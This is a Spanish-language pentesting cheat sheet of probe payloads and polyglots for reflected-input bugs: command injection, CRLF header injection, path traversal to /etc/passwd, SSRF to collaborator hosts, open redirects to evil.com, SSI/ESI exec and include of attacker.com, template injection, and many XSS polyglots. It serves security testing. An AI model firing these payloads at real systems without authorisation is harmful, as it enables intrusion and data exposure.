El objetivo de estas PoCs y Polygloths es dar al tester un resumen rápido de las vulnerabilidades que puede explotar si su entrada se refleja de alguna manera en la respuesta .
Esta cheat sheet no propone una lista completa de pruebas para cada vulnerabilidad , solo algunas básicas. Si buscas pruebas más completas, accede a cada vulnerabilidad propuesta.
No encontrarás inyecciones dependientes del Content-Type como XXE , ya que normalmente intentarás esas tú mismo si encuentras una solicitud que envía datos xml. Tampoco encontrarás inyecciones de base de datos aquí, ya que aunque algún contenido podría ser reflejado, depende en gran medida de la tecnología y estructura de la base de datos del backend.
Lista de Polygloths
Copy {{ 7 * 7 }} [ 7 * 7 ]
1 ;sleep$ { IFS } 9 ; #${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/* $(sleep 5 )`sleep 5 `` */- sleep ( 5 ) - '/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||" /* ` */
% 0d % 0aLocation : % 20http : // attacker . com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
< br >< b >< h1 > THIS IS AND INJECTED TITLE </ h1 >
/ etc / passwd
. . / . . / . . / . . / . . / . . / etc / hosts
. .\ ..\..\..\..\..\etc/hosts
/ etc / hostname
. . / . . / . . / . . / . . / . . / etc / hosts
C : / windows / system32 / drivers / etc / hosts
. . / . . / . . / . . / . . / . . / windows / system32 / drivers / etc / hosts
. .\ ..\..\..\..\..\windows/system32/drivers/etc/hosts
http : // asdasdasdasd . burpcollab . com / mal . php
\ \asdasdasdasd.burpcollab.com/mal.php
www . whitelisted . com
www . whitelisted . com . evil . com
https : // google . com
// google . com
javascript : alert ( 1 )
( \ \w*)+$
([a - zA - Z] + ) * $
((a + ) + ) + $
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{ 7 * 7 }} $ { 7 * 7 } <% = 7 * 7 %> $ {{ 7 * 7 }} #{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript : alert ()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-- > '"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Pruebas Básicas
Políglotas
Pruebas Básicas
Copy ; ls
|| ls ;
| ls ;
&& ls ;
& ls ;
%0Als
` ls `
$(ls )
Políglotas
Copy 1 ; sleep$ {IFS} 9 ;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5 ) ` sleep 5 `` * /-sleep( 5 )-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/ * ` * /
Pruebas Básicas
Copy %0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
Marcado Colgante
Pruebas Básicas
Copy <br><b><h1>THIS IS AND INJECTED TITLE </h1>
Pruebas Básicas
Copy /etc/passwd
. ./ . ./ . ./ . ./ . ./ . ./etc/hosts
.. \ .. \ .. \ .. \ .. \ .. \ etc/hosts
/etc/hostname
. ./ . ./ . ./ . ./ . ./ . ./etc/hosts
C:/windows/system32/drivers/etc/hosts
. ./ . ./ . ./ . ./ . ./ . ./windows/system32/drivers/etc/hosts
.. \ .. \ .. \ .. \ .. \ .. \ windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
Pruebas Básicas
Copy www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1 )
Pruebas Básicas
Copy ( \\w* ) +$
([a-zA-Z]+) *$
((a + ) + ) + $
Pruebas básicas
Copy <!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Políglotas
Copy <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Las mismas pruebas utilizadas para Open Redirect se pueden usar aquí.
Pruebas Básicas
Copy ${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Políglotas
Copy {{ 7 * 7 }} $ { 7 * 7 } <%= 7 * 7 %> $ {{ 7 * 7 }} #{7*7}${{<%[%'"}}%\
Pruebas básicas
Copy <xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Políglotas
Copy <xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
XSS
Pruebas Básicas
Copy " onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
Políglotas
Copy javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
Last updated 2 months ago